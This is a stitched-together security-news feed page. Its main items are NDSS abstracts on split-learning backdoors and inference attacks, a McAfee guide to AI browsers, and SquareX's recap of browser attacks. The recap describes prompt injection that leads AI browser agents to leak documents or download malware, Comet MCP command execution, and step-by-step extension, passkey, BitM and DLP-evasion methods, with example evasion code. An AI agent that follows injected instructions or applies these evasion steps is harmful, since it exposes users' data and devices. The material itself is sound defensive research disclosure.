
What makes smart secrets management essential?

How Are Non-Human Identities Revolutionizing Cybersecurity? Have you ever considered the pivotal role that Non-Human Identities (NHIs) play in cyber defense frameworks? As businesses increasingly shift operations to the cloud, safeguarding these machine identities becomes paramount. But what exactly are NHIs, and why is their management vital across industries? NHIs, often referred to as machine […]

The post What makes smart secrets management essential? appeared first on Entro.

The post What makes smart secrets management essential? appeared first on Security Boulevard.

How does Agentic AI empower cybersecurity teams?

Can Agentic AI Revolutionize Cybersecurity Practices? With digital threats consistently challenging organizations, how can cybersecurity teams leverage innovations to bolster their defenses? Enter the concept of Agentic AI—a technology that could serve as a powerful ally in the ongoing battle against cyber threats. By enhancing the management of Non-Human Identities (NHIs) and secrets security management, […]

The post How does Agentic AI empower cybersecurity teams? appeared first on Entro.

The post How does Agentic AI empower cybersecurity teams? appeared first on Security Boulevard.

Ring-fencing AI Workloads for NIST and ISO Compliance 

AI is transforming enterprise productivity and reshaping the threat model at the same time. Unlike human users, agentic AI and autonomous agents operate at machine speed and inherit broad network permissions and embedded credentials. This creates new security and compliance … Read More

The post Ring-fencing AI Workloads for NIST and ISO Compliance appeared first on 12Port.

The post Ring-fencing AI Workloads for NIST and ISO Compliance appeared first on Security Boulevard.

Afghan Terrorism Is a Small Threat in the United States

10/12/25
TERRORISM

Very little new information has been released since Rahmanullah Lakanwal murdered West Virginia National Guard member Sarah Beckstrom in Washington, DC, two weeks ago. He also shot and injured Andrew Wolfe, another National Guardsman, in the same attack. Prosecutors have since charged Lakanwal with murder, assault with intent to kill while armed, and possession of a firearm during a violent crime. Terrorism charges are absent because prosecutors do not yet know his motives; the FBI is conducting a terrorism investigation to determine them.


Trump Administration’s Immigrant Detention Policy Broadly Rejected by Federal Judges

12/10/25
IMMIGRATION

In federal courtrooms across America, a pattern has emerged in cases in which immigrants are being rounded up and jailed without a hearing. That’s a departure from fundamental constitutional protections in the U.S. that provide the right to a hearing before indefinite imprisonment.


SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks In Split Learning

Session 5C: Federated Learning 1

Authors, Creators & Presenters: Phillip Rieger (Technical University of Darmstadt), Alessandro Pegoraro (Technical University of Darmstadt), Kavita Kumari (Technical University of Darmstadt), Tigist Abera (Technical University of Darmstadt), Jonathan Knauer (Technical University of Darmstadt), Ahmad-Reza Sadeghi (Technical University of Darmstadt)

PAPER
SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks in Split Learning

Split Learning (SL) is a distributed deep learning approach enabling multiple clients and a server to collaboratively train and infer on a shared deep neural network (DNN) without requiring clients to share their private local data. The DNN is partitioned in SL, with most layers residing on the server and a few initial layers and inputs on the client side. This configuration allows resource-constrained clients to participate in training and inference. However, the distributed architecture exposes SL to backdoor attacks, where malicious clients can manipulate local datasets to alter the DNN's behavior. Existing defenses from other distributed frameworks like Federated Learning are not applicable, and there is a lack of effective backdoor defenses specifically designed for SL. We present SafeSplit, the first defense against client-side backdoor attacks in Split Learning (SL). SafeSplit enables the server to detect and filter out malicious client behavior by employing circular backward analysis after a client's training is completed, iteratively reverting to a trained checkpoint where the model under examination is found to be benign. It uses a two-fold analysis to identify client-induced changes and detect poisoned models. First, a static analysis in the frequency domain measures the differences in the layer's parameters at the server. Second, a dynamic analysis introduces a novel rotational distance metric that assesses the orientation shifts of the server's layer parameters during training. Our comprehensive evaluation across various data distributions, client counts, and attack scenarios demonstrates the high efficacy of this dual analysis in mitigating backdoor attacks while preserving model utility.
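The rotational distance idea in the abstract can be illustrated with a minimal sketch — our own toy interpretation, not the authors' implementation: treat a server layer's parameters as a flat vector and measure the angle between that vector before and after a client's training round.

```python
import math

def rotational_distance(theta_before, theta_after):
    """Angle (radians) between two flattened parameter vectors.

    Intuition: a benign update barely rotates the server layer's
    parameters, while a poisoned update tends to shift their
    orientation much more.
    """
    dot = sum(a * b for a, b in zip(theta_before, theta_after))
    norm_before = math.sqrt(sum(a * a for a in theta_before))
    norm_after = math.sqrt(sum(b * b for b in theta_after))
    # Clamp to [-1, 1] to guard against floating-point drift.
    cos = max(-1.0, min(1.0, dot / (norm_before * norm_after)))
    return math.acos(cos)

# A small perturbation leaves the angle near zero...
benign = rotational_distance([1.0, 2.0, 3.0], [1.01, 2.02, 2.97])
# ...while a sign-flipped (heavily manipulated) update rotates it far.
poisoned = rotational_distance([1.0, 2.0, 3.0], [-1.0, -2.0, -3.0])
assert benign < 0.1 < poisoned
```

A server could threshold such a metric per checkpoint and revert to the last checkpoint whose update stayed below it, as the paper's circular backward analysis describes.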


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their creators', authors', and presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.


The post SafeSplit: A Novel Defense Against Client-Side Backdoor Attacks In Split Learning appeared first on Security Boulevard.

NDSS 2025 – Passive Inference Attacks On Split Learning Via Adversarial Regularization

Session 5C: Federated Learning 1

Authors, Creators & Presenters: Xiaochen Zhu (National University of Singapore & Massachusetts Institute of Technology), Xinjian Luo (National University of Singapore & Mohamed bin Zayed University of Artificial Intelligence), Yuncheng Wu (Renmin University of China), Yangfan Jiang (National University of Singapore), Xiaokui Xiao (National University of Singapore), Beng Chin Ooi (National University of Singapore)

PAPER
Passive Inference Attacks on Split Learning via Adversarial Regularization

Split Learning (SL) has emerged as a practical and efficient alternative to traditional federated learning. While previous attempts to attack SL have often relied on overly strong assumptions or targeted easily exploitable models, we seek to develop more capable attacks. We introduce SDAR, a novel attack framework against SL with an honest-but-curious server. SDAR leverages auxiliary data and adversarial regularization to learn a decodable simulator of the client's private model, which can effectively infer the client's private features under the vanilla SL, and both features and labels under the U-shaped SL. We perform extensive experiments in both configurations to validate the effectiveness of our proposed attacks. Notably, in challenging scenarios where existing passive attacks struggle to reconstruct the client's private data effectively, SDAR consistently achieves significantly superior attack performance, even comparable to active attacks. On CIFAR-10, at the deep split level of 7, SDAR achieves private feature reconstruction with less than 0.025 mean squared error in both the vanilla and the U-shaped SL, and attains a label inference accuracy of over 98% in the U-shaped setting, while existing attacks fail to produce non-trivial results.


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their creators', authors', and presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.


The post NDSS 2025 – Passive Inference Attacks On Split Learning Via Adversarial Regularization appeared first on Security Boulevard.

How to Stay Safe on Your New AI Browser

By: McAfee

AI-powered browsers give you much more than a window to the web. They represent an entirely new way to experience the internet, with an AI “agent” working by your side.

We’re entering an age where you can delegate all kinds of tasks to a browser, and with that comes a few things you’ll want to keep in mind when using AI browsers like ChatGPT’s Atlas, Perplexity’s Comet, and others.

What are agentic AI browsers?

So, what's the allure of this new breed of browser? In short, it's highly helpful, and then some.

By design, these “agentic” AI browsers actively assist you with the things you do online. They can automate tasks and interpret your intentions when you make a request. Further, they can work proactively by anticipating things you might need or by offering suggestions.

In a way, an AI browser works like a personal assistant. It can summarize the pages in several open tabs, conduct research on just about any topic you ask it to, or even track down the lowest airfare to Paris in the month of May. Want it to order ink for your printer and some batteries for your remote? It can do that too. And that’s just to name a few possibilities.

As you can see, referring to the AI in these browsers as “agentic” fits. It truly works like an agent on your behalf, a capability that promises to get more powerful over time.

Is it safe to use an AI browser?

But as with any new technology, early adopters should balance excitement with awareness, especially when it comes to privacy and security. You might have seen some recent headlines that shared word of security concerns with these browsers.

The reported exploits vary, as does the harm they can potentially inflict: stealing personal info, gaining access to Gmail and Google Drive files, installing malware, and injecting the AI's "memory" with malicious instructions, which can follow a user from session to session and device to device, wherever they log in.

Our own research has shown that some of these attacks are now tougher to pull off than they were initially, particularly as the AI browser companies continue to put guardrails in place. If anything, this reinforces a long-standing truth about online security: it's a cat-and-mouse game. Tech companies put protections in place, bad actors discover an exploit, companies put further protections in place, new exploits crop up, and so on. It's much the same in the rapidly evolving space of AI browsers. The technology might be new, but the game certainly isn't.

While these reports don't mean AI browsers are necessarily unsafe to use, they do underscore how fast this space is evolving, and why caution is smart as the tech matures.

How To Use an AI Browser Safely

It’s still early days for AI-powered browsers and understanding the security and privacy implications of their use. With that, we strongly recommend the following to help reduce your risk:

Don’t let an AI browser do what you wouldn’t let a stranger do. Handle things like your banking, finances, and health on your own. And the same certainly goes for all the info tied to those aspects of your life.

Pay attention to confirmations. As of today, agentic browsers still require some level of confirmation from the user to perform key actions (like processing a payment, sending an email, or updating a calendar entry). Pay close attention to them, so you can prevent your browser from doing something you don’t want it to do.

Use the "logged out" mode, if possible. As of this writing, at least one AI browser, Atlas, gives you the option to use the agent in a logged-out mode. This limits its access to sensitive data and the risk of it taking actions on your behalf with your credentials.

If possible, disable “model learning.” By turning it off, you reduce the amount of personal info stored and processed by the AI provider for AI training purposes, which can minimize security and privacy risks.

Set privacy controls to the strictest options available. Further, understand what privacy policies the AI developer has in place. For example, some AI providers have policies that allow people to review your interactions with the AI as part of its training. These policies vary from company to company, and they tend to undergo changes. Keeping regular tabs on the privacy policy of the AI browser you use makes for a privacy-smart move.

Keep yourself informed. The capabilities, features, and privacy policies of AI-powered browsers continue to evolve rapidly. Set up news alerts about the AI browser you use and see if any issues get reported and, if so, how the AI developer has responded. Do routine searches pairing the name of the AI browser with “privacy.”

How McAfee Can Help

McAfee’s award-winning protection helps you browse safer, whether you’re testing out new AI tools or just surfing the web.

McAfee offers comprehensive privacy services, including personal info scans and removal plus a secure VPN.

Plus, protections like McAfee's Scam Detector automatically alert you to suspicious texts, emails, and videos before harm can happen—helping you manage your online presence confidently and safeguard your digital life for the long term. Likewise, Web Protection can help steer you clear of suspicious websites that might take advantage of AI browsers.

The post How to Stay Safe on Your New AI Browser appeared first on McAfee Blog.

Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure

AttackIQ has issued recommendations in response to the Cybersecurity Advisory (CSA) released by the Cybersecurity and Infrastructure Security Agency (CISA) on December 9, 2025, which details the ongoing targeting of critical infrastructure by pro-Russia hacktivists.

The post Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure appeared first on AttackIQ.

The post Response to CISA Advisory (AA25-343A): Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure appeared first on Security Boulevard.

2025 Year of Browser Bugs Recap: A Year of Unmasking Critical Browser Vulnerabilities

By: SquareX

At the beginning of this year, we launched the Year of Browser Bugs (YOBB) project, a commitment to research and share critical architectural vulnerabilities in the browser. Inspired by the iconic Months of Bugs tradition in the 2000s, YOBB was started with a similar purpose — to drive awareness and discussion around key security gaps and emerging threats in the browser.

Over the past decade, the browser has become the new endpoint: the primary gateway through which employees access SaaS apps, interact with sensitive data, and use the internet. The modern browser has also evolved significantly, with many capabilities that support complex web apps rivaling the performance of native apps. As with all new technologies, these same features are being abused by malicious actors to exploit users, taking advantage of a massive security gap left by traditional solutions that focus primarily on endpoints and networks. Compounded by the release of AI Browsers, the browser has become the single most common initial access point for attackers. Yet it remains poorly understood.

The YOBB project aims to demystify these vulnerabilities by highlighting architectural limitations, behavioral trends, and industry dynamics that cannot be fixed by a simple security patch. Over the past 12 months, we released 11 research pieces, including major zero-day vulnerabilities presented at DEF CON, Black Hat, RSA, and BSides. Below is a recap of our findings; the complete Year of Browser Bugs report is available for download here.

January 2025: Browser Syncjacking Attack

The Browser Syncjacking attack demonstrated that browser extensions, even just with simple read/write permissions available to popular extensions like Grammarly, can lead to full browser and device takeover by exploiting Google Workspace’s profile sync functionality. The attack unfolds in three escalating stages: profile hijacking, browser hijacking, and device hijacking.

  1. Profile Hijacking — the malicious extension, disguised as an AI tool, logs the user into an attacker-managed Chrome profile while the user is idle. This immediately allows the attacker to disable security features in the browser. The attacker can then further trick the user into syncing Chrome with the managed Google profile, giving attackers full access to all credentials and browsing history stored locally.
  2. Browser Hijacking — the same extension intercepts legitimate downloads like Zoom updates, replacing the file with the attacker’s malicious executable containing an enrollment token and registry modifications. Believing they’re installing a Zoom update, the victim runs the file, which installs registry entries that convert their browser into a managed browser under the attacker’s Google Workspace control.
  3. Device Hijacking — The same malicious file can also inject registry entries enabling the extension to communicate with native applications directly, bypassing additional authentication requirements. With this connection established, attackers leverage the extension alongside the local shell to gain complete device access — executing system commands, covertly activating cameras and microphones, capturing keystrokes, and accessing all applications and sensitive data on the machine.

As covered by:

👉 Learn more on our technical blog & demo

February 2025: Polymorphic Extensions

Polymorphic extensions are malicious extensions that can silently impersonate any extension, such as password managers and crypto wallets. The attack exploits end users’ reliance on visual cues to determine whether what they are interacting with is safe, and the fact that extensions can change their icons and appearance on the fly without any user warning. With additional permissions, these malicious extensions can even disable the real extension while they impersonate them.

  1. The user installs and pins a malicious extension, masquerading as a productivity tool.
  2. After some time, the extension disables and impersonates the user's password manager, creating pixel-perfect replicas of the target extension's icon, HTML popups, and workflows.
  3. The extension injects an HTML popup that prompts the user to re-login to their password manager.
  4. The user enters their master password, which the attacker uses to log in to the real password manager and access all passwords in the user's vault.

As covered by:

👉 Learn more on our technical blog & demo

March 2025: Browser Native Ransomware

Browser-native ransomware represents a fundamental shift in ransomware delivery, enabling ransomware attacks to be executed without any local files or processes and bypassing traditional anti-ransomware and EDR tools. Due to the proliferation of cloud storage and SaaS services, over 80% of enterprise data now resides in the cloud and is primarily accessed through the browser. By combining identity attacks and agentic workflows, attackers can systematically exfiltrate sensitive files and data and hold them hostage for ransom. While BNRs manifest in many ways, here are a few case studies:

  • File Storage BNR — via consent phishing (i.e. OAuth attacks), the attacker tricks users into granting their malicious app permission to “see, edit, create and delete all Google Drive files”. With AI agents, the attacker then systematically exfiltrates and deletes all files in the drive, including those shared by colleagues & customers, leaving a ransom note in place threatening to leak the data.
  • Email BNR — similarly, disguised as a legitimate tool, the attacker’s app requests permissions to “read, compose, send and permanently delete all email from Gmail”. Once granted, the attacker exfiltrates all emails to identify every SaaS app the victim is registered with by scraping welcome, notification, and billing emails. Using an AI agent, the attacker systematically resets passwords to these apps, logs the victim out, exfiltrates all data, and uploads ransom notes demanding payment in exchange for passwords and not leaking the data.
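The consent-phishing step in both case studies hinges on a legitimate-looking authorization URL that requests dangerously broad scopes. A minimal sketch of how such a URL is assembled — the client ID and redirect URI here are hypothetical, while the two scope strings are Google's real, documented identifiers for full Drive and Gmail access:

```python
from urllib.parse import urlencode

# Hypothetical attacker app registration; only the scope strings are real.
params = {
    "client_id": "attacker-app.apps.googleusercontent.com",
    "redirect_uri": "https://attacker.example/callback",
    "response_type": "code",
    "scope": " ".join([
        "https://www.googleapis.com/auth/drive",  # see/edit/create/delete all Drive files
        "https://mail.google.com/",               # full Gmail access
    ]),
    "access_type": "offline",  # refresh token: access outlives the session
}
consent_url = "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode(params)
```

Nothing about this URL is malformed: Google's consent screen will truthfully list the permissions. The attack lies entirely in persuading the user to approve them for an app disguised as a legitimate tool.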

As covered by:

👉 Learn more on our technical blog & demo

April 2025: Data Splicing Attacks

Disclosed at BSides SF, Data Splicing Attacks represent a new class of data exfiltration techniques capable of bypassing major enterprise DLP solutions listed in Gartner's Magic Quadrant. The research exposed fundamental architectural flaws in both endpoint-based and proxy-based DLP solutions that allow attackers to upload, paste, or print any sensitive data through the browser using several techniques:

  • Data Smuggling via Alternate Communication Channels — exfiltrating data via binary communication channels such as WebRTC and gRPC that are unmonitored by cloud SASE/SSE DLP or endpoint DLP solutions
  • Data Sharding — breaking files/data into small “shards” that individually do not trigger regex detection, only to reassemble them after DLP inspection
  • Data Ciphering — encrypting files, only to decrypt them after DLP inspection, exploiting the fact that most DLP solutions blanket block/allow encrypted files that they do not have decryption keys to inspect
  • Data Transcoding — encoding file/data with encoding techniques like Base64 such that they evade regex-based DLP policies, only to decode them post-inspection after file download or right before paste/upload
  • Data Insertion — inserting small characters in background color between texts to break regex, allowing sensitive files to be printed without triggering DLP policies
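To illustrate why regex-based inspection fails against transcoding and sharding, here is a minimal sketch of our own (not SquareX's tooling): a DLP rule that matches SSN-shaped strings misses the same data once it is Base64-encoded or split into shards, yet the data reassembles losslessly after inspection.

```python
import base64
import re

SSN_RULE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")  # toy DLP policy
secret = "SSN: 123-45-6789"

# Data Transcoding: Base64 hides the pattern from regex inspection...
encoded = base64.b64encode(secret.encode()).decode()
assert SSN_RULE.search(secret) and not SSN_RULE.search(encoded)
# ...and decodes losslessly after the DLP check.
assert base64.b64decode(encoded).decode() == secret

# Data Sharding: 4-byte shards individually never match the rule...
shards = [secret[i:i + 4] for i in range(0, len(secret), 4)]
assert not any(SSN_RULE.search(s) for s in shards)
# ...but reassemble into the original sensitive string post-inspection.
assert "".join(shards) == secret
```

The same asymmetry applies to the other techniques above: inspection happens once, at one point in the pipeline, while the attacker controls both sides of the encoding.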

As covered by:

📽️ Watch the BSides SF talk here

May 2025: Fullscreen BitM

While Browser-in-the-Middle (BitM) attacks have been known since 2021, they typically come with a major telltale sign — the parent window still displays a suspicious URL in the address bar, raising suspicion among security-aware users. Our research discovered that the Fullscreen API can be exploited to address this flaw, as any user interaction can be used to trigger a fullscreen popup containing the attacker-controlled noVNC window. Not knowing that they are now interacting with an attacker-controlled browser, the victim continues their work, unknowingly giving attackers the ability to watch everything they do as they open additional tabs and access enterprise apps, all while thinking they're in their own browser.

  1. The user lands on a phishing site impersonating a popular SaaS app (like Figma) through malvertising or SEO poisoning.
  2. When the user clicks what appears to be a normal “Log in” button, it triggers the Fullscreen API to expand a previously hidden BitM window to fullscreen.
  3. The fullscreen window displays the attacker’s remote browser showing the legitimate login page, completely covering the parent window’s suspicious URL.
  4. The user enters their credentials on the real site displayed in the attacker’s remote browser, successfully logging in without any indication of compromise.
  5. The user continues working — opening additional tabs and accessing other enterprise apps — all within the attacker-controlled remote browser under constant surveillance.

While all browsers are vulnerable to Fullscreen BitM, the attack works especially well on Safari due to the complete lack of visual indicators when entering fullscreen mode.

As covered by:

👉 Learn more on our technical blog & demo

June 2025: Browser AI Agents: The “New Weakest Link”

Since OpenAI launched Operator, AI agents have exploded in adoption, with 79% of organizations deploying agentic workflows today. Unfortunately, these agents are trained to do tasks, not to be security aware, making them even more vulnerable than the average employee. We demonstrated how browser AI agents fall prey to rudimentary attacks like phishing and OAuth attacks, leading to data exfiltration and malicious file downloads. Critically, these agents operate at the same privilege level as users, with full access to the same enterprise resources and few guardrails on agentic workflows.

Since our research, multiple agentic AI providers have improved their security guardrails, often requiring permission when high-risk actions are performed. However, these features are built at the discretion of the AI vendor. There is still no industry standard for AI vendors and enterprises alike when it comes to Agentic Identity and Agentic DLP, which becomes especially challenging with the volume of AI applications being built every day.

As covered by:

👉 Learn more on our technical blog & demo

July 2025: Architectural Limitations of Chrome DevTools

The past few years witnessed a surge in malicious browser extensions, including incidents like Geco Colorpick and the Cyberhaven breach. Most extensions are downloaded from official stores like the Chrome Web Store, leading enterprises to depend heavily on browser vendors to conduct security audits, trusting labels like "Verified" and "Chrome Featured Extension" as security indicators. Unfortunately, attackers can easily game the system with fake reviews and mass downloads; indeed, numerous verified extensions have been discovered to be malicious.

Yet there is still very little end users can do to inspect extension behavior in the browser, even with the Developer Tools provided by browser vendors. This YOBB installment highlights how trivial it is for malicious extensions to hide suspicious activity from DevTools by exploiting several key limitations:

  • Difficulty debugging content and service workers simultaneously
  • No visibility into message passing and internal communications between extension components
  • No source attribution for injected JavaScript (webpage vs. extension)
  • Limited network traffic logging that extensions can easily circumvent
  • No insights into offscreen documents to inspect background processes, hidden extension pages, and time/action-triggered behaviors

As covered by:

👉 Learn more on our technical blog & demo

August 2025: Passkeys Pwned: Turning WebAuthn Against Itself

At DEF CON 33, we disclosed a major implementation flaw in passkeys that allows attackers to intercept and forge the passkey registration and authentication flows, replacing the user's key pair with the attacker's.

  1. Via a malicious script or browser extension, the attacker force-fails the passkey authentication, forcing the user to re-register their passkey.
  2. The attacker intercepts the call during passkey registration and generates its own private and public key pair.
  3. The malicious extension stores the private key locally (or sends it to the attacker for login via their own device) and sends the public key to the service provider's server.
  4. When an authentication occurs, the extension/script intercepts this call too and signs the challenge with the stored attacker private key.
  5. Since the public key stored on the server is part of the malicious pair the attacker generated during registration, the authentication check succeeds.

Note that in both the registration and authentication flow, the user still enters their biometrics/PIN, a visual indicator that many associate with good security. However, in both scenarios, the authenticator’s response is dropped and replaced with the attacker’s public key/signed challenge before it ever reaches the server.
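The substitution logic above can be sketched in a few lines. This is a deliberately simplified toy: real WebAuthn uses asymmetric ECDSA key pairs, whereas this dependency-free stand-in uses a shared-secret HMAC for "sign" and "verify". The point it demonstrates is the flow, not the cryptography — the server's check passes because the server only ever saw the attacker's key.

```python
import hashlib
import hmac
import secrets

# Toy stand-in for passkey signing (real passkeys sign with ECDSA).
def sign(key: bytes, challenge: bytes) -> bytes:
    return hmac.new(key, challenge, hashlib.sha256).digest()

# Registration: the user's authenticator produces a key, but the malicious
# script drops it and registers the attacker's key with the server instead.
user_key = secrets.token_bytes(32)
attacker_key = secrets.token_bytes(32)
server_registered_key = attacker_key  # the substitution

# Authentication: the script intercepts the flow again and answers the
# server's challenge with the attacker's key.
challenge = secrets.token_bytes(16)
response = sign(attacker_key, challenge)

# The server's verification succeeds against the substituted key...
assert hmac.compare_digest(response, sign(server_registered_key, challenge))
# ...while the user's genuine key would fail the very same check.
assert not hmac.compare_digest(sign(user_key, challenge), response)
```

Nothing in the server's verification step can distinguish the two keys; the trust anchor was swapped at registration time.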

As covered by:

👉 Learn more on our technical blog & demo

September 2025: Architectural Security Vulnerabilities of AI Browsers

When Perplexity released Comet in July 2025, it brought to light what the future of browsers could look like. Our research deep-dived into AI Browsers to uncover how attackers can exploit them, including:

  • Falling into malicious workflows while surfing the internet — e.g. falling for consent phishing attacks while completing a research task, granting excessive OAuth permissions to malicious apps for full access to the user's Gmail and Google Drive without the user's knowledge
  • Falling into malicious instructions in trusted apps — e.g. following malicious instructions in emails & trusted SaaS apps to share confidential documents and add malicious links to calendar meetings
  • Downloading malicious files — e.g. downloading malware while trying to complete a form, even when the original user prompt never requested any downloads

Many other researchers in the community have also voiced similar concerns on prompt injection attacks that led AI Browsers to go rogue. Since then, popular AI Browsers like Comet and Atlas have started adding guardrails that require explicit user permissions for certain agentic tasks. This marks an encouraging example of what can be achieved when security researchers and innovators collaborate to make emerging technologies more secure.

As covered by:

👉 Learn more on our technical blog & demo

October 2025: AI Sidebar Spoofing

Building on our previous AI Browser research, AI Sidebar Spoofing attacks involve malicious extensions that inject a pixel-perfect replica of an AI sidebar. By impersonating the very interface that users trust to interact with these AI browsers, the spoofed sidebar can feed victims malicious instructions that eventually lead to phishing, malicious file downloads, and even device takeover.

As covered by:

👉 Learn more on our technical blog & demo

November 2025: Comet MCP API

We discovered a poorly documented MCP API in Comet that allows its embedded extensions to execute arbitrary local commands without explicit user permission. Critically, the MCP API is made available by default to Comet's embedded extensions, which are installed by default, hidden from the extension dashboard, and cannot be disabled by users even if compromised.

In our attack POC, we used extension stomping to demonstrate how the MCP API can be misused to execute ransomware. In the wild, however, this exploit is more likely to be delivered via XSS or network MitM, as those vectors require minimal end-user involvement. One day after our release, Comet silently shipped an update that disabled the MCP API. While we have not received official acknowledgement of our bug report, the patch is a positive move toward making the AI Browser safer.

As covered by:

👉 Learn more on our technical blog & demo

Secure Any Browser and Any Device

SquareX’s browser extension turns any browser on any device into an enterprise-grade secure browser. SquareX’s industry-first Browser Detection and Response (BDR) solution empowers organizations to proactively defend against browser-native threats including rogue AI agents, Last Mile Reassembly Attacks, malicious extensions and identity attacks. Unlike dedicated enterprise browsers, SquareX seamlessly integrates with users’ existing consumer browsers, delivering security without compromising user experience.

Ready to experience award-winning browser security? Visit www.sqrx.com to learn more or sign up for an enterprise pilot.


2025 Year of Browser Bugs Recap: A Year of Unmasking Critical Browser Vulnerabilities was originally published in SquareX Labs on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post 2025 Year of Browser Bugs Recap: A Year of Unmasking Critical Browser Vulnerabilities appeared first on Security Boulevard.

NIST Plans to Build Threat and Mitigation Taxonomy for AI Agents

The U.S. National Institute of Standards and Technology (NIST) is building a taxonomy of attacks and mitigations for securing artificial intelligence (AI) agents. Speaking at the AI Summit New York conference, Apostol Vassilev, a research team supervisor for NIST, told attendees that the arm of the U.S. Department of Commerce is working with industry partners..

The post NIST Plans to Build Threat and Mitigation Taxonomy for AI Agents appeared first on Security Boulevard.

When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions

In December 2025, a ransomware attack on Marquis Software Solutions, a data analytics and marketing vendor serving the financial sector, compromised sensitive customer information held by multiple banks and credit unions, according to Infosecurity Magazine. The attackers reportedly gained access through a known vulnerability in a firewall device connected to Marquis’s remote-access systems. The incident

The post When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions appeared first on Seceon Inc.

The post When Vendors Become the Vulnerability: What the Marquis Software Breach Signals for Financial Institutions appeared first on Security Boulevard.
